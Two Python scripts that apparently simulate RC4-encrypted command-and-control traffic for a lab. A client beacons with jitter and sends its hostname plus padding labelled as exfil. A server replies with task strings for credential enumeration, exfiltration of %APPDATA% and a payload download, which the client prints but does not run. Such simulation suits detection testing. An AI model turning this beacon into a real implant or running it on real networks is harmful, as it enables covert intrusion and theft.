rc4 encryption

client.py

import socket
import time
import random
import string
from arc4 import ARC4

# Configuration
C2_SERVER = ('172.31.255.29', 443)   # Change to your lab C2 IP
KEY = b'APT38SecretKey2025!'
BEACON_INTERVAL = 30                  # seconds between beacons (average)
JITTER = 0.4                          # +/- 40% jitter
MIN_PAYLOAD = 200                     # bytes
MAX_PAYLOAD = 8192                    # bytes (simulates file exfil, screenshots, etc.)

def random_payload(min_size, max_size):
    size = random.randint(min_size, max_size)
    payload = ''.join(random.choices(string.ascii_letters + string.digits + '/+', k=size)).encode()
    return payload

arc4 = ARC4(KEY)

while True:
    try:
        s = socket.socket()
        s.settimeout(10)
        s.connect(C2_SERVER)

        # Outbound beacon / staged exfil
        data_out = f"BEACON|{socket.gethostname()}|DOMAIN.LOCAL|{random.randint(1000,9999)}|" + ''.join(random.choices(string.printable, k=random.randint(50,500)))
        encrypted_out = arc4.encrypt(data_out.encode() + random_payload(MIN_PAYLOAD, MAX_PAYLOAD))
        s.send(encrypted_out)

        # Receive and decrypt tasking (server may send large payload)
        response = s.recv(65535)
        if response:
            decrypted = ARC4(KEY).decrypt(response)   # New ARC4 instance per-stream (correct RC4 behavior)
            print(f"[+] Received {len(response)} bytes → {decrypted[:200]}...")

        s.close()
    except Exception as e:
        print(f"[-] Connection failed: {e}")

    # Jittered sleep
    sleep_time = BEACON_INTERVAL * random.uniform(1 - JITTER, 1 + JITTER)
    time.sleep(sleep_time)

server.py

import socket
import random
import time
from arc4 import ARC4   # ← THIS WAS MISSING

KEY = b'APT38SecretKey2025!'
SERVER_IP = '172.31.255.29'
PORT = 443

tasks = [
    b"TASK: Run whoami /all",
    b"TASK: Screenshot",
    b"TASK: Exfil %APPDATA%\\*",
    b"TASK: Download http://c2.domain/payload.dll",
    b"IDLE",
]

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_IP, PORT))
s.listen(50)
print(f"[*] High-volume RC4 C2 listening on {SERVER_IP}:{PORT}")

while True:
    try:
        client, addr = s.accept()
        print(f"[+] Implant connected from {addr[0]}")

        data = client.recv(65535)
        if not data:
            client.close()
            continue

        decrypted = ARC4(KEY).decrypt(data)
        print(f"[+] Decrypted ({len(data)} bytes): {decrypted[:200]}...")

        # Simulate occasional large downlink (payloads, updates, etc.)
        task = random.choice(tasks)
        if random.random() < 0.15:   # 15% chance of large payload
            fake_payload = random.randbytes(random.randint(50000, 300000))  # 50–300 KB
            response = task + b'||PAYLOAD||' + fake_payload
        else:
            response = task + random.randbytes(random.randint(100, 2000))

        encrypted_response = ARC4(KEY).encrypt(response)
        client.send(encrypted_response)
        client.close()

    except Exception as e:
        print(f"[-] Error: {e}")